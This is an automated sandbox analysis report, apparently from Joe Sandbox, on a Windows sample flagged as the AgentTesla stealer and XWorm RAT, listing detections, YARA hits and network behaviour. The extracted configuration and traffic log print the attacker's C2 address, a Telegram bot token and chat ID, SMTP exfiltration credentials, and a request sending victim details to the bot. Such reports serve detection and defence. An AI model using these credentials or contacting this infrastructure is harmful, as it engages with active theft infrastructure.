Windows Analysis Report
DJ5PhUwOsM.exe

Overview

General Information

Sample name: DJ5PhUwOsM.exe
renamed because original name is a hash value
Original sample name: 65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa.exe
Analysis ID: 1562433
MD5: d61526463472da19dd8869f484a8f4ef
SHA1: 20514ac586fb6847057be18ecf00b84cda7e948f
SHA256: 65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa
Tags: 89-40-31-232exeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: DJ5PhUwOsM.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Avira: detection malicious, Label: TR/Spy.Gen8
Found malware configuration
Source: 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe ReversingLabs: Detection: 81%
Multi AV Scanner detection for submitted file
Source: DJ5PhUwOsM.exe ReversingLabs: Detection: 92%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DJ5PhUwOsM.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack String decryptor: 89.40.31.232
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack String decryptor: 1717
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack String decryptor: 28Nov2024
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack String decryptor: USB.exe
Uses 32bit PE files
Source: DJ5PhUwOsM.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49706 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 89.40.31.232
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 89.40.31.232:1717
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEMEDIA-ASRO TELEMEDIA-ASRO
Source: Joe Sandbox View ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr String found in binary or memory: https://account.dyn.com/
Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr String found in binary or memory: https://api.ipify.org
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: DJ5PhUwOsM.exe, FB_7D21.tmp.exe.0.dr String found in binary or memory: https://api.telegram.org/bot
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs .Net Code: nUAqbab
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs .Net Code: nUAqbab
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: DJ5PhUwOsM.exe, type: SAMPLE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: DJ5PhUwOsM.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E7E270 2_2_00E7E270
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E7A958 2_2_00E7A958
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E74A98 2_2_00E74A98
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E73E80 2_2_00E73E80
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E741C8 2_2_00E741C8
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E7C36F 2_2_00E7C36F
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F5640 2_2_064F5640
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F6668 2_2_064F6668
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F7DF0 2_2_064F7DF0
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064FC200 2_2_064FC200
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064FB2A2 2_2_064FB2A2
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F3100 2_2_064F3100
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F7710 2_2_064F7710
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F2409 2_2_064F2409
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064FE418 2_2_064FE418
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F5D5F 2_2_064F5D5F
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F0040 2_2_064F0040
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_064F0006 2_2_064F0006
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Code function: 3_2_00007FF848F28EF2 3_2_00007FF848F28EF2
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Code function: 3_2_00007FF848F28146 3_2_00007FF848F28146
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Code function: 3_2_00007FF848F2651D 3_2_00007FF848F2651D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe FB247F5397BA1B2D9328D1ACC2FD322181A91CED1953853ABB41718DC21198AE
PE file contains executable resources (Code or Archives)
Source: DJ5PhUwOsM.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: DJ5PhUwOsM.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Sample file is different than original file name gathered from version info
Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe Binary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe Binary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe
Uses 32bit PE files
Source: DJ5PhUwOsM.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: DJ5PhUwOsM.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: DJ5PhUwOsM.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs Cryptographic APIs: 'TransformFinalBlock'
Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs Cryptographic APIs: 'TransformFinalBlock'
Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
